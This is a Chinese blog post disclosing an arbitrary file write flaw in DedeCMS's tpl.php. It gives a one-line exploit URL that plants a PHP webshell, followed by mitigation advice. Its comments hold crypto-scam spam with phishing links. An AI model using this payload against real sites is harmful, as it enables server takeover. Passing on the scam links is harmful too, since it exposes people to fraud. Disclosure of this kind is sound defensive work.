织梦CMS最新任意写入漏洞
文章来源:小灰博客| 时间:2018-07-30 16:32:20| 作者:Leo | 8 条评论
今天服务器提示有webshell文件,上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞,也不知道这个漏洞有多久了,是否被公开,既然发现了就记录下把,具体是利用tpl.php的文件管理功能,对标签的一个写入漏洞。exp是这样的
1 | www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php |
访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马,就是url里写的PHP代码,如图
(图丢了,自己领悟)
具体想写什么在url里带入就行,接下来上菜刀,链接即可。需要注意一点,生成的文件名必须是 xxx.lib.php
具体防护方法修改后台路径肯定是必不可少的 ,当然现在曝下织梦路径也不是什么难事,首先可以关闭/include/taglib/下的写入权限,其次其实很多网站根本用不着文件管理器,建议直接把tpl.php文件删除或者重命名。
如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!
分享该文章到:

8 条评论
-
Email; Process 1,93296 bitcoin. GET => https://yandex.com/poll/enter/E34y9iSdaRJD7QXHZ9jb9R?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
2025 年 6 月 20 日 下午 9:24
-
Message: Operation 1,579770 bitcoin. Withdraw => https://graph.org/Official-donates-from-Binance-04-01?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
2025 年 4 月 12 日 下午 11:14
-
Notification: Transaction №TN98. ASSURE =>> https://telegra.ph/Binance-Support-02-18?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
2025 年 3 月 13 日 下午 1:22
-
You have received a notification № 252423. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
2025 年 1 月 22 日 下午 9:04
-
You have 1 message(-s) № 618. Go > https://telegra.ph/Message--2868-12-25?hs=8b618b6f3e2558ea545b01f25c66ea45&说道:
2024 年 12 月 26 日 上午 2:02
-
今日头条说道:
2019 年 10 月 28 日 下午 11:44
-
头条说道:
2019 年 1 月 24 日 下午 11:37
-
骨骼尚美说道:
2018 年 12 月 9 日 下午 10:59
o9143x
f5w4y0
5jevqs
z91sjl
crsdu6
文章不错支持一下吧
文章不错非常喜欢
不错的文章,学习了